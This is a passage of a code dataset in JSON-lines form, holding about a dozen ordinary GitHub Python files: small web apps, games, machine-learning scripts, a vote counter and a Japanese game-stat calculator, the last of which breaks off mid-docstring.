+{"seq_id":"18888579811","text":"import flask\nimport werkzeug\nimport time\nfrom flask import Flask, request, Response\nimport numpy as np\nimport cv2\n\n\napp = flask.Flask(__name__)\n\n# route http posts to this method\n@app.route('/', methods=['GET','POST'])\ndef handle_request(): \n files_ids = list(flask.request.files)\n print(\"\\nNumber of Received Images : \", len(files_ids))\n image_num = 1\n for file_id in files_ids:\n print(\"\\nSaving Image \", str(image_num), \"/\", len(files_ids))\n imagefile = flask.request.files[file_id]\n filename = werkzeug.utils.secure_filename(imagefile.filename)\n print(\"Image Filename : \" + imagefile.filename)\n timestr = time.strftime(\"%Y%m%d-%H%M%S\")\n imagefile.save(timestr+'_'+filename)\n image_num = image_num + 1\n print(\"\\n\")\n return \"Image(s) Uploaded Successfully. Come Back Soon.\"\n\n# Use your ip address host = 'ipv4 address' or host = '0.0.0.0'\napp.run(port=5000, host='192.168.43.124', debug=True)\n","repo_name":"ak224001/Andriod-and-Flask-Server","sub_path":"Sever/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"742910519","text":"import json\nimport random\nfrom exceptions import TrackNotFoundError, DuplicateIDError\n\nPOUND_TEMPLATE_LOCATION = '../json/pound_setlist_template.json'\nPOUND_TRACK_LIST_LOCATION = '../json/pound_track_list.json'\n\ndef build_pound_setlist(difficulty, length, version, include_arm_track):\n \"\"\" Creates setlist for current template and vars \"\"\"\n template = _parse_pound_setlist_template(difficulty, length, version)\n setlist = []\n for slot in template:\n setlist_track = _build_new_track(setlist, slot, include_arm_track)\n setlist.append(setlist_track)\n return setlist\n\ndef _parse_pound_setlist_template(difficulty, length, version):\n \"\"\" Transform setlist from JSON file text to JSON object as global var \"\"\"\n with open(POUND_TEMPLATE_LOCATION, 'r', encoding='UTF-8') as template_file:\n data = template_file.read()\n template_file.close()\n data_json = json.loads(data)\n template = data_json[difficulty][length][version]\n return template\n\ndef _build_new_track(setlist, track_template, include_arm_track):\n \"\"\" Chooses and builds a single setlist track, after filtering for dupes and requirements\"\"\"\n track_type = track_template['type']\n track_level = None\n if 'level' in track_template:\n track_level = track_template['level']\n track_options = _parse_pound_track_list(track_type, track_level)\n\n is_arm_track = False\n if 'canBeArmTrack' in track_template and include_arm_track:\n track_options = list(filter(lambda track: track['canBeArmTrack'] is True, track_options))\n is_arm_track = True\n\n track_options = _filter_duplicates(setlist, track_options)\n \n if len(track_options) == 0:\n raise TrackNotFoundError(f'No track available of type {track_type} with level {track_level} for slot {track_template}.\"')\n\n chosen_track = track_options[random.randrange(0, len(track_options))]\n\n new_track = {}\n new_track['type'] = track_type\n new_track['level'] = track_level\n new_track['name'] = chosen_track['name']\n new_track['artist'] = chosen_track['artist']\n new_track['isArmTrack'] = is_arm_track\n new_track['id'] = chosen_track['id']\n\n return new_track\n\ndef _parse_pound_track_list(track_type, track_level):\n \"\"\" Transforms known tracks from JSON file text to JSON object \"\"\"\n with open(POUND_TRACK_LIST_LOCATION, 'r', encoding='UTF-8') as pound_track_list_file:\n data = pound_track_list_file.read()\n pound_track_list_file.close()\n\n data_json = json.loads(data)\n try:\n pound_track_list = data_json[str(track_type)]\n except KeyError as exc:\n raise TrackNotFoundError(f'No track of type {track_type} available in list of known songs. Please choose a different setlist or update the song list.') from exc\n\n if track_level:\n try:\n pound_track_list = pound_track_list[str(track_level)]\n except KeyError as exc:\n raise TrackNotFoundError(f'No track of type {track_type} with level {track_level} available in list of known songs. 
Please choose a different setlist or update the song list.') from exc\n return pound_track_list\n\ndef get_pound_replacement_track_options(setlist, track_num, include_arm_track, difficulty, length, version):\n \"\"\" Gets list of tracks with same params as given track_num \"\"\"\n\n # get old track details\n track_index = int(track_num) - 1\n old_track = setlist[track_index]\n track_type = old_track['type']\n track_level = old_track['level']\n\n # get user choice\n track_options = _parse_pound_track_list(track_type, track_level)\n template = _parse_pound_setlist_template(difficulty, length, version)\n if 'canBeArmTrack' in template[track_index] and include_arm_track:\n track_options = list(filter(lambda track: track['canBeArmTrack'] is True, track_options))\n\n # filter duplicates\n track_options = _filter_duplicates(setlist, track_options)\n\n return track_options\n\ndef _filter_duplicates(setlist, options):\n \"\"\" Filters duplicate songs out of list based on id \"\"\"\n ids_in_setlist = list(map(lambda track: track['id'], setlist))\n return list(filter(lambda track: track['id'] not in ids_in_setlist, options))\n\ndef replace_pound_track(setlist, replace_track_num, new_track_id):\n \"\"\" Replaces given track with given new track in setlist \"\"\"\n \n # get new track based on id\n new_track = _find_track_by_id(new_track_id)\n\n track_index = int(replace_track_num) - 1\n old_track = setlist[track_index]\n track_type = old_track['type']\n track_level = old_track['level']\n is_arm_track = old_track['isArmTrack']\n\n insert = {}\n insert['type'] = track_type\n insert['level'] = track_level\n insert['name'] = new_track['name']\n insert['artist'] = new_track['artist']\n insert['isArmTrack'] = is_arm_track\n insert['id'] = new_track['id']\n\n setlist[track_index] = insert\n return setlist\n\ndef _find_track_by_id(track_id):\n \"\"\" Transforms track with given id from JSON file text to JSON object \"\"\"\n with open(POUND_TRACK_LIST_LOCATION, 'r', encoding='UTF-8') as pound_track_list_file:\n data = pound_track_list_file.read()\n pound_track_list_file.close()\n\n data_json = json.loads(data)\n track = []\n for type_entry in data_json:\n curr_data = data_json[type_entry]\n if isinstance(curr_data, dict):\n for level_entry in data_json[type_entry]:\n curr_data = data_json[type_entry][level_entry]\n track = list(filter(lambda t: t['id'] == int(track_id), curr_data))\n if len(track) > 1:\n raise DuplicateIDError('There is more than one track with the ID ' + track_id + ' found in the POUND track list.')\n if len(track) == 1:\n return track[0]\n if isinstance(curr_data, list):\n track = list(filter(lambda t: t['id'] == int(track_id), curr_data))\n if len(track) > 1:\n raise DuplicateIDError('There is more than one track with the ID ' + track_id + ' found in the POUND track list.')\n if len(track) == 1:\n return track[0]\n if len(track) == 0:\n raise TrackNotFoundError('There is no track with ID ' + track_id + ' found in the POUND track list.')\n return track[0]","repo_name":"sierra-acy/pound-setlist-generator","sub_path":"setlist-generator/api/pound.py","file_name":"pound.py","file_ext":"py","file_size_in_byte":6271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"16075950943","text":"def insertionSort(theSeq):\n n = len(theSeq)\n for i in range(1, n):\n value = theSeq[i]\n pos = i\n while pos > 0 and value < theSeq[pos - 1]:\n theSeq[pos] = theSeq[pos - 1]\n pos -= 1\n theSeq[pos] = value\n\nl = []\nx = int(input(\"Enter The Number Of Elements: \"))\nprint(\"Enter The Elements: \")\nfor i in range(x):\n a = int(input())\n l.append(a)\n\ninsertionSort(l)\nprint(\"\\nSorted List: \", l)","repo_name":"mihir-28/Data-Structure","sub_path":"insertionsort.py","file_name":"insertionsort.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2637778715","text":"import unittest\n\nfrom src.constants import TILE_SIZE\nfrom src.game_entities.destroyable import DamageKind\nfrom src.game_entities.foe import Keyword\nfrom src.game_entities.weapon import Weapon\nfrom tests.random_data_library import (\n random_weapon,\n random_foe_entity,\n random_player_entity,\n)\nfrom tests.tools import minimal_setup_for_game\n\n\nclass TestWeapon(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n minimal_setup_for_game()\n\n def test_init_weapon(self):\n name = \"short_sword\"\n sprite = \"imgs/dungeon_crawl/item/weapon/short_sword_2_old.png\"\n description = \"A basic little sword, but one that can already prove very useful\"\n price = 500\n equipped_sprite = [\"imgs/dungeon_crawl/player/hand_right/short_sword.png\"]\n durability = 40\n reach = [1]\n power = 4\n kind = \"PHYSICAL\"\n weight = 2\n restrictions = []\n possible_effects = []\n strong_against = [Keyword.LARGE]\n sword = Weapon(\n name,\n sprite,\n description,\n price,\n equipped_sprite,\n power,\n kind,\n weight,\n durability,\n reach,\n restrictions,\n possible_effects,\n strong_against,\n )\n self.assertEqual(name, sword.name)\n self.assertEqual(description, sword.description)\n self.assertEqual(\"Short Sword\", str(sword))\n self.assertEqual(price, sword.price)\n self.assertEqual(price // 2, sword.resell_price)\n self.assertEqual(durability, sword.durability_max)\n self.assertEqual(durability, sword.durability)\n self.assertEqual(reach, sword.reach)\n self.assertEqual(power, sword.attack)\n self.assertEqual(DamageKind[kind], sword.attack_kind)\n self.assertEqual(weight, sword.weight)\n self.assertEqual(restrictions, sword.restrictions)\n self.assertEqual(possible_effects, sword.effects)\n self.assertEqual(strong_against, sword.strong_against)\n\n def test_decreasing_durability(self):\n durability = 40\n weapon = random_weapon(durability=durability)\n self.assertEqual(durability, weapon.durability)\n self.assertEqual(durability, weapon.durability_max)\n\n for i in range(durability):\n current_durability = weapon.durability\n weapon.used()\n self.assertEqual(current_durability - 1, weapon.durability)\n\n self.assertEqual(0, weapon.durability)\n\n def test_resell_price_following_durability(self):\n price = 500\n durability = 40\n weapon = random_weapon(price=price, durability=durability)\n self.assertEqual(price // 2, weapon.resell_price)\n self.assertEqual(durability, weapon.durability)\n self.assertEqual(durability, weapon.durability_max)\n\n for i in range(durability):\n before_use_price = weapon.resell_price\n weapon.used()\n self.assertTrue(weapon.resell_price < before_use_price)\n\n self.assertEqual(0, weapon.resell_price)\n\n def test_hit_power(self):\n power = 3\n strong_against = []\n weapon = random_weapon(atk=power, strong_against=strong_against)\n self.assertEqual(power, weapon.hit(random_player_entity(), random_foe_entity()))\n\n def test_stronger_against_specific_entity_kind(self):\n power = 5\n strong_against = [Keyword.LARGE]\n weapon = random_weapon(atk=power, strong_against=strong_against)\n\n normal_foe = random_foe_entity(keywords=[])\n self.assertEqual(power, weapon.hit(random_player_entity(), normal_foe))\n\n vulnerable_foe = random_foe_entity(keywords=[Keyword.LARGE])\n self.assertEqual(power * 2, weapon.hit(random_player_entity(), vulnerable_foe))\n\n def test_stronger_against_multiple_entity_kinds(self):\n power = 4\n strong_against = [Keyword.LARGE, Keyword.CAVALRY]\n weapon = random_weapon(atk=power, strong_against=strong_against)\n\n 
non_vulnerable_foe = random_foe_entity(keywords=[Keyword.SMALL])\n self.assertEqual(power, weapon.hit(random_player_entity(), non_vulnerable_foe))\n\n vulnerable_foe = random_foe_entity(keywords=[Keyword.LARGE])\n self.assertEqual(power * 2, weapon.hit(random_player_entity(), vulnerable_foe))\n\n super_vulnerable_foe = random_foe_entity(\n keywords=[Keyword.CAVALRY, Keyword.LARGE]\n )\n self.assertEqual(\n power * 3, weapon.hit(random_player_entity(), super_vulnerable_foe)\n )\n\n def test_charge_bonus(self):\n power = 4\n spear = random_weapon(atk=power, attack_kind=\"PHYSICAL\", charge=True)\n player = random_player_entity()\n player.strength = 5\n attacked_ent = random_foe_entity(\n min_hp=1000, max_hp=1000, max_defense=0, keywords=[]\n )\n player.equip(spear)\n # No charge\n self.assertEqual(player.strength + spear.attack, player.attack(attacked_ent))\n\n # Charge\n player.position = (\n player.old_position[0] + 5 * TILE_SIZE,\n player.old_position[1],\n )\n self.assertEqual(\n player.strength + int(spear.attack * 1.5), player.attack(attacked_ent)\n )\n\n # Stronger charge\n player.position = (\n player.old_position[0] + 8 * TILE_SIZE,\n player.old_position[1],\n )\n self.assertEqual(\n player.strength + int(spear.attack * 2), player.attack(attacked_ent)\n )\n\n def test_no_charge_bonus_for_weapon_with_no_charge(self):\n power = 4\n weapon = random_weapon(atk=power, attack_kind=\"PHYSICAL\", charge=False)\n player = random_player_entity()\n player.strength = 5\n attacked_ent = random_foe_entity(\n min_hp=1000, max_hp=1000, max_defense=0, keywords=[]\n )\n player.equip(weapon)\n\n # No charge bonus even if there is a \" charge \"\n player.position = (\n player.old_position[0] + 5 * TILE_SIZE,\n player.old_position[1],\n )\n self.assertEqual(player.strength + weapon.attack, player.attack(attacked_ent))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Grimmys/rpg_tactical_fantasy_game","sub_path":"tests/test_weapon.py","file_name":"test_weapon.py","file_ext":"py","file_size_in_byte":6270,"program_lang":"python","lang":"en","doc_type":"code","stars":319,"dataset":"github-code","pt":"91"}
+{"seq_id":"9743295513","text":"import gym\nimport time\nimport random\n\nimport numpy as np\n\nenv = gym.make(\"MountainCar-v0\")\n\nprint(env.action_space.n)\n\nprint(env.reset()) # print the current state of the agent in the environment\n\nprint(env.observation_space.high)\nprint(env.observation_space.low)\n\nDISCRETE_OS_SIZE = [20, 20] # split our observation space for 20 parts\ndiscrete_os_win_size = (env.observation_space.high - env.observation_space.low)/DISCRETE_OS_SIZE # the size of one bucket of os\n\nprint(discrete_os_win_size)\n\nq_table = np.random.uniform(low=-2, high=0, size=DISCRETE_OS_SIZE + [env.action_space.n])\n\nprint(len(q_table))\nprint(q_table)\n\ncounter1 = 0\nfor row in q_table:\n for cell in row:\n print(cell)\n counter1 +=1\n\nprint('counter cell: ', counter1)\n\ndone = False\ncounter = 0\nwhile not done:\n counter += 1\n print(counter)\n #time.sleep(0.01)\n #time.sleep(random.randint(0, 8)*0.01)\n action = random.randint(0,2)\n new_state, reward, done, _ = env.step(action)\n #print(env.step(action))\n print('new_state : ', new_state, 'reward: ', reward, 'done: ', done, _)\n env.render()\n\n\n\n","repo_name":"jonndoe/MountainCar-v0","sub_path":"scrap/main3.py","file_name":"main3.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"12271032029","text":"from PyQt5 import QtWidgets\nfrom addres import * # импорт нашего сгенерированного файла\nimport sys\nfrom BD import Orm\n\n\nclass AddResponsible(QtWidgets.QDialog):\n def __init__(self):\n super(AddResponsible, self).__init__()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.ui.buttonBox.accepted.connect(self.add)\n self.ui.buttonBox.rejected.connect(self.close)\n\n self.bd = Orm()\n\n def add(self):\n name = self.ui.lineEdit.text() # имя\n family = self.ui.lineEdit_2.text() # фамилия\n patronymic =self.ui.lineEdit_3.text() # отчество\n position = self.ui.lineEdit_4.text() # должность\n\n self.bd.addres(name, family, patronymic, position)\n self.close()\n\n","repo_name":"Vorlogg/Material-Accounting","sub_path":"AddRespons.py","file_name":"AddRespons.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18783379372","text":"#!/usr/bin/env python\n#==============================================================================\n#author\t\t\t:Miryam de Lhoneux\n#email\t\t\t:miryam.de_lhoneux@lingfil.uu.se\n#date\t\t\t:2015/12/30\n#version\t\t:1.0\n#Python version :2.7.6\n#==============================================================================\n\nimport config\nimport src.utils\nclass UDtreebank():\n def __init__(self,language,location = config.data):\n self._language = language\n self._location = location\n iso_dic = src.utils.iso_code\n files_prefix = self._location + language + \"/\" + iso_dic[self._language]\n self.trainfile = files_prefix + \"-ud-train.conllu\"\n self.devfile = files_prefix + \"-ud-dev.conllu\"\n self.testfile = files_prefix + \"-ud-test.conllu\"\n","repo_name":"mdelhoneux/oDETTE","sub_path":"odette/src/UD_treebank.py","file_name":"UD_treebank.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"70978783022","text":"\"\"\"\nBooking App - Forms\n----------------\nForms for Booking App\n\n\"\"\"\n\nfrom django import forms\nfrom datetime import date\nfrom .models import Booking, Table\nfrom django.contrib import messages\n\n\nclass BookingForm(forms.Form):\n \"\"\"\n Form for the Booking Model\n \"\"\"\n\n date = forms.DateField(widget=forms.DateInput(attrs={\n 'id': 'datePicker', 'class': 'form-control', 'type': 'date'}),\n label='', error_messages={\n 'required': \"Please Enter your Name\"\n })\n start_time = forms.TimeField(widget=forms.TimeInput(attrs={\n 'id': 'startTime', 'class': 'form-control', 'type': 'time',\n 'step': '3600'}), label='')\n end_time = forms.TimeField(widget=forms.TimeInput(\n attrs={'id': 'endTime', 'class': 'form-control',\n 'type': 'time', 'step': '3600'}), label='')\n table_code = forms.ChoiceField(widget=forms.Select(\n attrs={'id': 'tableCode', 'class': 'form-control'}),\n choices=(\n (\"A1\", \"A1\"), (\"A2\", \"A2\"), (\"B1\", \"B1\"),\n (\"B2\", \"B2\"), (\"C1\", \"C1\"), (\"C2\", \"C2\")))\n customer_full_name = forms.CharField(widget=forms.TextInput(\n attrs={'id': 'fullName', 'class': 'form-control',\n 'type': 'text', }), required=False)\n customer_email = forms.EmailField(widget=forms.EmailInput(\n attrs={'id': 'email', 'class': 'form-control',\n 'type': 'email'}), required=False)\n book_on_user = forms.BooleanField(widget=forms.CheckboxInput(\n attrs={'id': 'bookAuthenticate',\n 'type': 'checkbox'}), required=False)\n\n def clean(self):\n cleaned_data = super().clean()\n customer_full_name = cleaned_data['customer_full_name']\n customer_email = cleaned_data['customer_email']\n book_on_user = cleaned_data['book_on_user']\n # table_obj = Table.objects.get(code=cleaned_data['table_code'])\n\n if (not (customer_email and customer_full_name) and not book_on_user):\n raise forms.ValidationError(\"Either write name and email or book \"\n + \"on your name by selecting checkbox\")\n\n # if Booking.objects.filter(table=table_obj).exists():\n # raise forms.ValidationError\n # (\"Table is occupied try selecting different table\")\n return cleaned_data\n","repo_name":"Dhvani-intwala/spice-villa","sub_path":"booking/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"3958200266","text":"# import pandas as pd\n# import main\nimport numpy as np\nfrom statistics import mean\n\ndata_load = np.zeros(360 * 1440).reshape(360, 1440)\ndata = data_load.T[::4]\ndata = data_load.T[4::4]\n\nstep_y = None\nstep_x = None\n\n\ndef open_file(filepath, flag):\n global data_load # Использование глобальной переменной\n global data # Использование глобальной переменной\n data_load = np.genfromtxt(filepath, delimiter=',')[1::] # Считывание файла\n data = data_load.T[::4] # Выборка для датасета по градусам долготы\n data = data.T[4::4] # Выборка для датасета по градусам широты\n # print(flag)\n if flag == 1: # Если нажата кнопка\n return data # Возврат не полного датасета\n else: # Иначе\n return data_load # Возврат полного датасета\n\n\ndef add_file(filepath, flag):\n global data_load # Использование глобальной переменной\n global data # Использование глобальной переменной\n add_data_load = np.genfromtxt(filepath, delimiter=',')[1::] # Считывание файла\n add_data = add_data_load.T[::4] # Выборка для датасета по градусам долготы\n add_data = add_data.T[4::4] # Выборка для датасета по градусам широты\n if flag == 1: # Если нажата кнопка\n for i in range(len(add_data)):\n for j in range(len(add_data.T)):\n data[i, j] = mean([add_data[i, j], data[i, j]]) # Усреднение значений\n return data # Возврат не полного датасета\n else:\n for i in range(len(add_data_load)):\n for j in range(len(add_data_load.T)):\n data_load[i, j] = mean([add_data_load[i, j], data_load[i, j]]) # Усреднение значений\n return data_load # Возврат полного датасета\n\n\ndef calculate_laplasian(flag):\n global data_load # Использование глобальной переменной\n global data # Использование глобальной переменной\n if flag == 1: # Проверка на возврат датасета по градусам\n calculate_data = data.T[::step_x] # Выборка по шагам для датасета по градусам долготы\n calculate_data = calculate_data.T[::step_y] # Выборка по шагам для датасета по градусам широты\n else:\n calculate_data = data_load.T[::step_x] # Выборка по шагам для датасета по градусам долготы\n calculate_data = calculate_data.T[::step_y] # Выборка по шагам для датасета по градусам широты\n y_len, x_len = calculate_data.shape # Запись длины массива по строкам и столбцам\n # Создание нового пустого массива\n data_laplas = np.empty(calculate_data.size, dtype=str).reshape(int(y_len), int(x_len))\n for i in range(y_len):\n for j in range(x_len):\n data_laplas[i, j] = 'X' # Заполнение массива\n\n for i in range(1, y_len - 1): # проход по столбцам, пропуская первые и последние записи\n for j in range(x_len): # проход по строкам\n # расчёт лапласиан, если это последний номер строки\n if j >= x_len - 1:\n sub = (calculate_data[i - 1, j] + calculate_data[i, 0] + calculate_data[i, j - 1]\n + calculate_data[i + 1, j]) - calculate_data[i, j] * 4\n else: # расчёт лапласиан по формуле ([0,1]+[1,2]+[1,0]+[2,1]) - [1,1]*4\n sub = (calculate_data[i - 1, j] + calculate_data[i, j + 1] + calculate_data[i, j - 1]\n + calculate_data[i + 1, j]) - calculate_data[i, j] * 4\n if sub < 0: data_laplas[i, j] = '-' # если меньше нуля, то записываем \"-\"\n if sub > 0: data_laplas[i, j] = '+' # если больше нуля, то \"+\"\n if sub == 0: data_laplas[i, j] = '0' # если значения равны, то \"0\"\n return data_laplas # возвращения нового массива с подсчитанными 
лапласианами\n","repo_name":"KirillKovardakov/geostatSGU","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"21987021504","text":"from typing import Set, List\n\nimport numpy as np\nimport pandas\nimport torch\nfrom gensim.models import KeyedVectors\nfrom gensim.models.keyedvectors import Word2VecKeyedVectors\n\nfrom utils.log_hepler import logger\nfrom utils.path_helper import ROOT_DIR\n\nPAD_WORD = \"\"\n# Change this value according to the word embedding you use.\n# Check code in get_word_vec()\nPAD_WORD_ID = 3000000\nWORD_EMBEDDING_SIZE = 300\n\n\ndef review2wid(review: str, word_vec: Word2VecKeyedVectors) -> List[int]:\n \"\"\"\n 1. Convert words in review to word idx, which is from pre-trained word embedding model.\n 2. Pad or shorten review to max length.\n \"\"\"\n\n wids = []\n pad_index = word_vec.vocab[PAD_WORD].index\n for word in review.split():\n if word in word_vec:\n wid = word_vec.vocab[word].index\n else:\n # PAD_WORD also used as UNK_WORD\n wid = pad_index\n wids.append(wid)\n\n return wids\n\n\ndef get_word_vec(path='data/GoogleNews-vectors-negative300.bin'):\n \"\"\"\n Read pre-trained word embedding model, and add \"\" to it with zero weight.\n \"\"\"\n\n logger.info(\"loading word2vec model...\")\n path = ROOT_DIR.joinpath(path)\n word_vec = KeyedVectors.load_word2vec_format(path, binary=True)\n\n if PAD_WORD not in word_vec:\n word_vec.add([PAD_WORD], np.zeros([1, 300]))\n logger.info(f\"Add PAD_WORD to word embedding.\")\n\n assert PAD_WORD_ID == word_vec.vocab[PAD_WORD].index, \\\n f\"PAD_WORD_ID should be {word_vec.vocab[PAD_WORD].index} but not {PAD_WORD_ID}.\"\n\n logger.info(\"word2vec model loaded.\")\n return word_vec\n\n\ndef save_embedding_weights(word_vec, out_path=\"data/embedding_weight.pt\"):\n \"\"\"\n Save the weights of pre-trained word embedding model to file.\n Thus we don't need to load it when train our model.\n This helps to save RAM and model init time.\n \"\"\"\n\n weight = torch.Tensor(word_vec.vectors)\n torch.save(weight, ROOT_DIR.joinpath(out_path))\n logger.info(\"Word embedding weight saved.\")\n\n\ndef load_embedding_weights(path=\"data/embedding_weight.pt\"):\n return torch.load(path)\n\n\n# Find the unknowns words in review text.\n# This step is not necessary for model train.\nif __name__ == \"__main__\":\n df = pandas.read_json(ROOT_DIR.joinpath(\"data/reviews.json\"), lines=True)\n word_vec = get_word_vec()\n unknown_words: Set[str] = set()\n for review in df[\"review\"]:\n for word in review.split():\n if word not in word_vec:\n unknown_words.add(word)\n\n logger.warning(f\"{len(unknown_words)} unknown words!\")\n with open(ROOT_DIR.joinpath(\"out/UNKs.txt\"), \"w\", encoding=\"utf-8\") as f:\n for word in unknown_words:\n f.write(f\"{word}\\n\")\n","repo_name":"KindRoach/NARRE-Pytorch","sub_path":"utils/word2vec_helper.py","file_name":"word2vec_helper.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
+{"seq_id":"14321570522","text":"import csv \nimport os \n\ntotal_votes = 0\nkhan_votes = 0\ncorrey_votes = 0 \nli_votes = 0 \notooley_votes = 0\n\n\n\n\n\nelection_file = os.path.join(\"../\", \"Hw2.CSV\")\nwith open(election_file, newline= \"\",encoding= \"utf-8\") as csvfile:\n csvreader = csv.reader(csvfile, delimiter = \",\")\n csvheader = next(csvreader)\n\n for row in csvreader:\n total_votes +=1 \n\n if row[2] == \"Khan\": \n khan_votes +=1\n elif row[2] == \"Correy\":\n correy_votes +=1\n elif row[2] == \"Li\": \n li_votes +=1\n elif row[2] == \"O'Tooley\":\n otooley_votes +=1\n\ncandidates = [\"Khan\", \"Correy\", \"Li\",\"O'Tooley\"]\nvotes = [khan_votes, correy_votes,li_votes,otooley_votes]\n\n\ndict_candidates_and_votes = dict(zip(candidates,votes))\nkey = max(dict_candidates_and_votes, key=dict_candidates_and_votes.get)\n\n\nkhan_percent = (khan_votes/total_votes) *100\ncorrey_percent = (correy_votes/total_votes) * 100\nli_percent = (li_votes/total_votes)* 100\notooley_percent = (otooley_votes/total_votes) * 100\n\nprint(f\"Election Results\")\nprint(f\"............................\")\nprint(f\"Total Votes: {total_votes}\")\nprint(f\"............................\")\nprint(f\"Khan: {khan_percent:.3f}% ({khan_votes})\")\nprint(f\"Correy: {correy_percent:.3f}% ({correy_votes})\")\nprint(f\"Li: {li_percent:.3f}% ({li_votes})\")\nprint(f\"O'Tooley: {otooley_percent:.3f}% ({otooley_votes})\")\nprint(f\"............................\")\nprint(f\"Winner: {key}\")\nprint(f\"............................\")\n\n\n\n\nfile = open(\"outputfile.txt\", \"w\")\n\n\nfile.write(f\"Election Results\")\nfile.write(\"\\n\")\nfile.write(f\"............................\")\nfile.write(\"\\n\")\nfile.write(f\"Total Votes: {total_votes}\")\nfile.write(\"\\n\")\nfile.write(f\"............................\")\nfile.write(\"\\n\")\nfile.write(f\"Khan: {khan_percent:.3f}% ({khan_votes})\")\nfile.write(\"\\n\")\nfile.write(f\"Correy: {correy_percent:.3f}% ({correy_votes})\")\nfile.write(\"\\n\")\nfile.write(f\"Li: {li_percent:.3f}% ({li_votes})\")\nfile.write(\"\\n\")\nfile.write(f\"O'Tooley: {otooley_percent:.3f}% ({otooley_votes})\")\nfile.write(\"\\n\")\nfile.write(f\"............................\")\nfile.write(\"\\n\")\nfile.write(f\"Winner: {key}\")\nfile.write(\"\\n\")\nfile.write(f\"............................\")\n","repo_name":"skennedy18/python_hw","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"29313578057","text":"#%%\nSTATUS_BASE = 1 # ステータス1に対しての価値\nSTATUS_UP = 1.2 # ステータスに対して、重要なステータスの上振れ率\nSTATUS_DOWN = 0.8 # ステータスに対して、重要でないステータスの下振れ率\n# スピード、スタミナ、パワー、根性(いらないのでとりあえず下げてる)、賢さの価値\nSTATUS_ALL = [STATUS_BASE, STATUS_BASE, STATUS_BASE, STATUS_BASE*STATUS_DOWN, STATUS_BASE]\n\nBONDS_PER = 1/4 # 絆ゲージが溜まっていない場合、ゲージ進行度別の価値割合\nBONDS_UP = 1.2 # 友情トレーニングの時の平均ステータス上昇率\nBONDS_BASE = 10 # 友情トレーニングの価値計算の時に使う基礎値\n# 友情トレーニングを行った時の価値計算(1枚、2枚、3枚)\nBONDS_VALUE = [BONDS_UP*BONDS_BASE, BONDS_UP**2*BONDS_BASE, BONDS_BASE**3*BONDS_UP]\n# 上記の価値に対して、ゲージ進行度に関数る割合をかけて絆ゲージをあげる価値と定める\n\nPHYSICAL_PER = 2/3 # 体力に対する価値(p計算法からそのまま引用)\nSKILL_PER = 2/5 # スキルに対する価値(p計算法からそのまま引用)\n\nTIPS_STATUS_UP_PER = 0.3 # ヒントで得られるステータスorスキルでの割合\nTIPS_SKILL_PER = 0.7\nTIPS_STATUS_VALUE = (6+2)*TIPS_STATUS_UP_PER # ヒントでもらえるステータス価値\nTIPS_SKILL_VALUE_USE = 10*TIPS_SKILL_PER # ヒントで得られるスキルが欲しいものかどうか(確率無視)\nTIPS_SKILL_VALUE_NO = 3*TIPS_SKILL_PER\nTIPS_BONDS_PER = 5/7 # ヒントによる絆ゲージアップの恩恵(5ポイントUPするのでその割合)\nTIPS_BONDS_VALUE = BONDS_VALUE[0]*TIPS_BONDS_PER # ヒントによる絆ゲージアップの価値\nTIPS_USE_VALUE = TIPS_STATUS_VALUE+TIPS_SKILL_VALUE_USE # 使えるスキルのヒント価値\nTIPS_NO_VALUE = TIPS_STATUS_VALUE+TIPS_SKILL_VALUE_NO # 使えないスキルのヒント価値\n# この価値に対して、絆ゲージの価値を現状の割合(BONDS_PER)でかけた値を足して価値として計算可能\n\nCONDITION_PER = [1.2, 1.1, 1.0, 0.9, 0.8] # 調子ごとのステータス影響率\nCONDITION_BASE = 20 # 調子のベース価値\n# 未来に起こる減少イベントは無視(予測不可)\n# あくまで現在の調子から、お出かけなどをする価値があるのかを計算する\nCONDITION_EVENT = [0.3, 0.7] # お出かけによる2UPと1UPの割合をざっくり\n# 1.2 = 5ターンにつき、1ターン分の利益\n# 1.1 = 10ターンにつき、1ターン分の利益 逆は損失\n# 計算めんどなったので、とりあえず引用しておく\nCONDITION_VALUE = 15\n\n# 機会に関しても計算めんどくさいのでそのまま引用\nOP_MAIN = 40\nOP_SUB = 30\nOP_OTHER = 15\n\n\n\nclass P:\n def __init__(self, s=STATUS_ALL, b=BONDS_VALUE, pp=PHYSICAL_PER, sp=SKILL_PER, tuv=TIPS_USE_VALUE,\n tnv=TIPS_NO_VALUE, cv=CONDITION_VALUE, om=OP_MAIN, os=OP_SUB, oo=OP_OTHER):\n self.status = s\n self.bonds = b\n self.physical_per = pp\n self.skill_per = sp\n self.tips = [tuv, tnv, 0]\n self.condition_v = cv\n self.op = [om, os, oo]\n\n def calc(self, status_up, skill_up=3, op=0, tips=2, condition=0, bonds1=0, bonds2=0, bonds3=0, physical=25):\n '''\n 引数 :\n op : メイン(0)サブ(1)その他(2)を指定\n status_up : ステータスの上昇値(必須)\n tips : 欲しい(0)欲しくない(1)なし(2)\n consdition : 